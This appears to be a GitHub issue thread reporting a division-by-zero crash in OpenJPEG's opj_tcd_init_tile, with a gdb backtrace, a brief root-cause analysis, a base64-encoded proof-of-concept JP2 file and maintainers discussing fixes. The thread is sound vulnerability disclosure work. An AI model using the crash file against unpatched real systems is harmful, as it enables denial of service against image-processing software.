division-by-zero (SIGFPE) error in opj_tcd_init_tile function (line 730 of tcd.c)

[trylab]

---

Testing Environment

Ubuntu + OpenJPEG (GitHub master, 2016/03/28)

---

Exception Information

username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/001.jp2
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/001.jp2

[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image

Program received signal SIGFPE, Arithmetic exception.
0xb7fc446d in opj_tcd_init_tile (p_tcd=0x8062850, p_tile_no=0, isEncoder=0,
fraction=0.5, sizeof_block=56, manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:730
730 if ((((OPJ_UINT32)-1) / l_data_size) < (OPJ_UINT32)(l_tilec->y1 - l_tilec->y0)) {

(gdb) p l_data_size
$1 = 0

(gdb) bt
#0 0xb7fc446d in opj_tcd_init_tile (p_tcd=0x8062850, p_tile_no=0, isEncoder=0,

                                 fraction=0.5, sizeof_block=56, manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:730

#1 0xb7fc571b in opj_tcd_init_decode_tile (p_tcd=0x8062850, p_tile_no=0,

                                        p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:1043

#2 0xb7fa80be in opj_j2k_read_tile_header (p_j2k=0x8060298, p_tile_index=0xbfff9e84,

                                        p_data_size=0xbfff9e88, p_tile_x0=0xbfff9e8c, 
                                        p_tile_y0=0xbfff9e90, p_tile_x1=0xbfff9e94, 
                                        p_tile_y1=0xbfff9e98, p_nb_comps=0xbfff9e9c, 
                                        p_go_on=0xbfff9e80, p_stream=0x8060170, 
                                        p_manager=0x80601e4) 
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:8076

#3 0xb7fac298 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170,

                                    p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:9717

#4 0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,

                            p_stream=0x8060170, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:7341

#5 0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,

                              p_image=0x8062890, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:9943

#6 0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,

                              p_image=0x8062890, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/jp2.c:1487

#7 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8062890)

at ~/Desktop/openjpeg/src/lib/openjp2/openjpeg.c:412

#8 0x0804c2c0 in main (argc=5, argv=0xbffff124)

at ~/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330

---

Simple Analysis

The value of l_data_size is zero.
The code ((OPJ_UINT32)-1)/l_data_size will cause a divide-by-zero exception (SIGFPE).

---

Proof-of-Concept file

Please decode the following content with base64 algorithm.
Then you should save the decoded content to a jp2 file to generate the PoC.

AAAADGpQICANCocKAAAAFGZ0eXBqcEEgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABAAAAAiY2RlZgAEAAAAAAABpAEAAAACAAIA
AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAFAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQEAQEEIAEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z

---

Credit

This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.

[stweil]

The decoded jp2 file is available in this zip archive: test.zip. I added code to PR #730 which handles the division by zero error.

[trylab]

@stweil Thanks for your patch. It works fine.

[stweil]

@mayeut, did you have a look at my PR #730 which also fixed the division by zero but in a different way? With your patch, l_data_size == 0 won't stop processing.

[mayeut]

@stweil, I saw what you did in your PR. I'd rather merge only one change. Now, regarding this specific check, it'll stop processing with "allocation failed" (malloc(0) = NULL). I don't know if Zero size tile data is legal or not (e.g. border tile with subsample components might lead to zero size tile => is that legal ?). Maybe @detonin can shed some light on this. If it's legal, I'd stick with what I just merged. If it's not legal, then your approach would be better.

[stweil]

Just tell me when you need a separate PR for the l_data_size == 0 case. I can split PR #730 of course.